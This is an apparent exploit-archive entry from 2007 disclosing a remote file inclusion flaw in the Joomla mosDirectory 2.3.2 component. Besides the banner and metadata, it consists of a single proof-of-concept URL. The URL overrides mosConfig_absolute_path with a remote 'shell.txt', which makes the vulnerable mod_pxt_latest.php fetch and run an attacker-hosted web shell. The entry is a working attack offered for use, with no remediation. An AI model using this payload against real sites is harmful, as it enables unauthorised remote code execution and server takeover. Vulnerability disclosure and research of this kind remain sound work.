id: 2399
date: 12/24/2007
title: Joomla Component mosDirectory 2.3.2 Remote File Inclusion Vuln
author: ShockShadow
cves: 

==============================================================
Joomla Component mosDirectory 2.3.2 Remote File Inclusion Vuln
==============================================================



--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+          Joomla Component mosDirectory 2.3.2 Remote File Inclusion          +==--
--==+=============================================================================+==--

Software:     Joomla Component mosDirectory 2.3.2
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team 

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################




#  0day.today [2023-03-26]  #